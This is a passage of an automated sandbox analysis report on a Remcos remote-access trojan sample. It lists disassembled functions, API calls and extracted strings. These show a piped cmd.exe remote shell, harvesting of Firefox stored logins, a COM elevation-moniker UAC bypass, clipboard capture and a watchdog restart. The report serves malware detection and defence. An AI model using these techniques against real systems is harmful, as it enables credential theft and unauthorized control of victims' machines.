379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 402 40f240 380->402 403 40f243-40f256 CreateThread 380->403 402->403 404 40f264-40f26b 403->404 405 40f258-40f262 CreateThread 403->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2e7 call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 416->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 416->427 418->416 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                    APIs
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\winhlp32.exe,00000104), ref: 0040E9EE
                                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\winhlp32.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                    • API String ID: 2830904901-3471202801
                                    • Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                    • Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                    • SetEvent.KERNEL32(?), ref: 00404E43
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                    • closesocket.WS2_32(?), ref: 00404E5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                    • SetEvent.KERNEL32(?), ref: 00404EA2
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                    • SetEvent.KERNEL32(?), ref: 00404EBA
                                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                                    • SetEvent.KERNEL32(?), ref: 00404ED1
                                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                    • String ID: PkGNG
                                    • API String ID: 2403171778-263838557
                                    • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                    • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 473 448566-44857a 474 448587-4485a2 LoadLibraryExW 473->474 475 44857c-448585 473->475 476 4485a4-4485ad GetLastError 474->476 477 4485cb-4485d1 474->477 478 4485de-4485e0 475->478 479 4485bc 476->479 480 4485af-4485ba LoadLibraryExW 476->480 481 4485d3-4485d4 FreeLibrary 477->481 482 4485da 477->482 483 4485be-4485c0 479->483 480->483 481->482 484 4485dc-4485dd 482->484 483->477 485 4485c2-4485c9 483->485 484->478 485->484
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                    • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 486 40d069-40d095 call 401fab CreateMutexA GetLastError
                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                    • GetLastError.KERNEL32 ref: 0040D083
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID: SG
                                    • API String ID: 1925916568-3189917014
                                    • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                    • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 489 4484ca-4484f4 490 4484f6-4484f8 489->490 491 44855f 489->491 492 4484fe-448504 490->492 493 4484fa-4484fc 490->493 494 448561-448565 491->494 495 448506-448508 call 448566 492->495 496 448520 492->496 493->494 499 44850d-448510 495->499 498 448522-448524 496->498 500 448526-448534 GetProcAddress 498->500 501 44854f-44855d 498->501 502 448541-448547 499->502 503 448512-448518 499->503 504 448536-44853f call 43436e 500->504 505 448549 500->505 501->491 502->498 503->495 506 44851a 503->506 504->493 505->501 506->496
                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc__crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 2279764990-0
                                    • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                    • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                    • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                    • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 509 40165e-401664 510 401666-401668 509->510 511 401669-401674 509->511 512 401676 511->512 513 40167b-401685 511->513 512->513 514 401687-40168d 513->514 515 4016a8-4016a9 call 4344ea 513->515 514->515 517 40168f-401694 514->517 518 4016ae-4016af 515->518 517->512 519 401696-4016a6 call 4344ea 517->519 520 4016b1-4016b3 518->520 519->520
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                    • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004500D4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 537 4500d4-4500e1 call 445af3 539 4500e6-4500f1 537->539 540 4500f7-4500ff 539->540 541 4500f3-4500f5 539->541 542 45013f-45014d call 446782 540->542 543 450101-450105 540->543 541->542 544 450107-450139 call 448a84 543->544 549 45013b-45013e 544->549 549->542
                                    APIs
                                      • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                    • _free.LIBCMT ref: 00450140
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                    • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                    • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                    • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 550 445af3-445afe 551 445b00-445b0a 550->551 552 445b0c-445b12 550->552 551->552 553 445b40-445b4b call 4405dd 551->553 554 445b14-445b15 552->554 555 445b2b-445b3c RtlAllocateHeap 552->555 559 445b4d-445b4f 553->559 554->555 556 445b17-445b1e call 445545 555->556 557 445b3e 555->557 556->553 563 445b20-445b29 call 442f80 556->563 557->559 563->553 563->555
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                    • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                    • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                    • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 566 446137-446143 567 446175-446180 call 4405dd 566->567 568 446145-446147 566->568 575 446182-446184 567->575 570 446160-446171 RtlAllocateHeap 568->570 571 446149-44614a 568->571 572 446173 570->572 573 44614c-446153 call 445545 570->573 571->570 572->575 573->567 578 446155-44615e call 442f80 573->578 578->567 578->570
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                    • CloseHandle.KERNEL32 ref: 00405A23
                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                    • CloseHandle.KERNEL32 ref: 00405A45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                    • API String ID: 2994406822-18413064
                                    • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                    • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                    • API String ID: 3018269243-13974260
                                    • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                    • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                    • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 004168C2
                                    • EmptyClipboard.USER32 ref: 004168D0
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: !D@
                                    • API String ID: 3520204547-604454484
                                    • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                    • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 00407521
                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Object_wcslen
                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    • API String ID: 240030777-3166923314
                                    • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                    • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                    Memory Dump Source
